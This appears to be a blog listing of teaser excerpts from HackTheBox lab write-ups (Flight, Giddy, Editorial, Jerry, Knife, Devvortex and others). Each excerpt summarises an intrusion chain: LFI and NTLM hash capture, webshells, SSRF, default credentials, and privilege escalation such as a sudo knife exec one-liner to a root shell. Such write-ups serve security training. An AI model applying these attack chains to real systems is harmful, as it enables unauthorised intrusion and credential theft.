Web

Machine #73 on the Lain Kusanagi list. Flight earns its Hard rating not through any single clever trick, but through sheer chain length - each hop unlocks exactly one new thing, and you have to string six or seven of them together to reach SYSTEM. It’s a patience test as much as a technical one. Machine Info Name Flight Platform HackTheBox OS Windows Difficulty Hard IP 10.129.7.136 Domain flight.htb TL;DR Nmap shows a full AD port set. Gobuster vhost finds school.flight.htb, a PHP app with a ?view= parameter vulnerable to LFI. UNC path inclusion leaks svc_apache’s NTLMv2 hash via Responder - john cracks it to S@Ss!K@*t13. Password spray finds S.Moon reuses the same password. S.Moon has WRITE on the Shared share - use ntlm_theft to drop a desktop.ini coercion file, Responder captures C.Bum’s hash, john cracks it to Tikkycoll_431012284. C.Bum has WRITE on the Web share - upload a PHP webshell, get a reverse shell as svc_apache. Generate a msfvenom payload, catch it in msfconsole, upload RunasCs via meterpreter, run as C.Bum to get a second session. Port-forward port 8000 (internal IIS dev site) through the C.Bum session, discover C:\inetpub\development is writable, upload an ASPX webshell, get a shell as IIS AppPool\DefaultAppPool. That account has SeImpersonatePrivilege - msfconsole getsystem uses Named Pipe Impersonation (EfsPotato variant) to land NT AUTHORITY\SYSTEM. ...

SQL injection doesn’t always mean dumping a database. Sometimes it just means coaxing the server into making a network connection it shouldn’t - and that’s enough to steal credentials. Giddy is a great example of that, paired with a creative privesc that requires bypassing Windows Defender with a custom payload. Machine Info Field Details Name Giddy Platform HackTheBox OS Windows Difficulty Medium IP 10.129.96.140 TL;DR ASP.NET MVC app has a search endpoint vulnerable to SQL injection. We use xp_dirtree to force the SQL Server to authenticate outbound to our Responder instance, capturing Stacy’s NTLMv2 hash. After cracking it, Evil-WinRM gives us a shell. On the machine we find a unifivideo folder hinting at CVE-2016-6914 - Ubiquiti UniFi Video’s service hijacks taskkill.exe on stop. Defender blocks msfvenom, so we cross-compile a custom Go payload to add a local admin user and RDP in as root. ...

Another medium box that starts with just a web form and ends with a root shell through a surprisingly elegant chain. Editorial is all about knowing what to look for — and what to ask the server to fetch for you. Machine Info Field Value Name Editorial Platform HackTheBox OS Linux Difficulty Medium IP 10.129.1.101 TL;DR SSRF on the book cover URL field → internal API on port 5000 → /api/latest/metadata/messages/authors leaks SSH creds for dev → git history in ~/apps reveals prod credentials → prod can run a GitPython clone script as root → ext:: protocol injection sets SUID on /bin/bash → root. ...

Two vulnerabilities, zero authentication required for either one. Buff is a good reminder that public exploits sometimes just work - and that internal services running on non-standard ports are always worth the extra look. Machine info Name Buff Platform HackTheBox OS Windows Difficulty Easy TL;DR Web app running Gym Management System 1.0 is vulnerable to unauthenticated RCE (EDB-48506) - drops a webshell and a shell as buff\shaun Internal port 8888 is running CloudMe 1.1.12, accessible only from localhost Uploaded Chisel for port forwarding, then fired a buffer overflow exploit (EDB-48389) against CloudMe to get a SYSTEM shell Recon Nmap 1 nmap -sV -sC -Pn 10.129.2.18 ...

Default credentials. WAR file upload. SYSTEM. Jerry is short, but it covers a technique that shows up on real engagements more often than you would expect. Machine info Name Jerry Platform HackTheBox OS Windows Difficulty Easy TL;DR Apache Tomcat 7.0.88 on port 8080 with default credentials (tomcat:s3cret) Uploaded a malicious WAR reverse shell via the Tomcat Manager Shell landed directly as NT AUTHORITY\SYSTEM - both flags in a single session Recon Nmap 1 nmap -sV -sC -Pn 10.129.34.208 ...

Default credentials and a comment field that should never have held a password - two very human mistakes that open the door all the way to root. Machine info Name Keeper Platform HackTheBox OS Linux Difficulty Easy TL;DR Web server redirects to tickets.keeper.htb running Request Tracker (RT) - default credentials (root:password) work A user profile comment reads “Initial password set to Welcome2023!” - SSH access as lnorgaard Home directory contains RT30000.zip with a KeePass dump and .kdbx file keepass_dump recovers a partial master password; context clues complete it KeePass vault holds a PuTTY SSH key for root - convert and log in Recon Nmap 1 nmap -sV -sC -Pn -A 10.129.229.41 ...

Sometimes the vulnerability is not in your target’s code - it is in their supply chain. Knife is a good example of what happens when a poisoned release slips through. Machine info Name Knife Platform HackTheBox OS Linux Difficulty Easy TL;DR A web server running PHP 8.1.0-dev - a version that shipped with a backdoor - allows arbitrary command execution via a custom HTTP header Initial shell as james, sudo -l reveals the knife CLI can be run as root without a password sudo knife exec -E "exec('/bin/bash')" drops a root shell immediately Recon Nmap 1 nmap -sV -sC -Pn -A 10.129.34.68 ...

A PDF converter hiding a command injection CVE, credentials buried in a Ruby config file, and a YAML deserialization gadget to finish it off - Precious stacks three clean techniques on top of each other. Machine info Name Precious Platform HackTheBox OS Linux Difficulty Easy TL;DR Web app converts URLs to PDFs using pdfkit v0.8.6, which is vulnerable to CVE-2022-25765 (command injection) Initial shell as ruby, Bundler config at ~/.bundle/config leaks credentials for user henry Henry can run a Ruby script as root with sudo; the script uses YAML.load - exploitable via deserialization to get a root shell Recon Nmap 1 nmap -sV -sC -Pn -A 10.129.228.98 ...

Directory brute-force gets you nowhere on Devvortex. The win is one layer up - in the subdomains. Machine info Name Devvortex Platform HackTheBox OS Linux Difficulty Easy TL;DR Subdomain enumeration reveals dev.devvortex.htb, running Joomla 4.2.6 joomscan identifies the exact version; CVE-2023-23752 leaks usernames and the admin password via unauthenticated REST API endpoints Log in as lewis, edit the active Cassiopeia template to plant a PHP webshell, get a shell as www-data configuration.php re-exposes the MySQL password; query the sd4fg_users table and crack logan’s bcrypt hash with John su logan, check sudo: (ALL:ALL) /usr/bin/apport-cli - escape through the less pager to root Recon Nmap 1 nmap -sV -sC -Pn -A devvortex.htb ...

Sometimes nmap does half the work for you. .git on port 80 is all the hint you need. Machine info Name Dog Platform HackTheBox OS Linux Difficulty Easy TL;DR Nmap’s http-git script flags an exposed .git directory; a browser extension confirms it gitdumper.py reconstructs the repository and surfaces the Backdrop CMS settings file with database credentials: root:BackDropJ2024DS2024 The git log commit message references the Backdrop URL aliases docs, which reveals the /accounts/[user:name] pattern - wfuzz enumerates valid usernames, and the DB password logs in as tiffany Backdrop 1.27.1 has a known authenticated RCE (EDB 52021); the module installer only accepts tar/tgz/gz/bz2, so the exploit’s zip output needs repackaging before upload - shell as www-data Two users on the box; the same DB credential switches to johncusack sudo -l shows bee (Backdrop’s CLI) without a password; bee php-eval with --root gives root Recon Nmap ...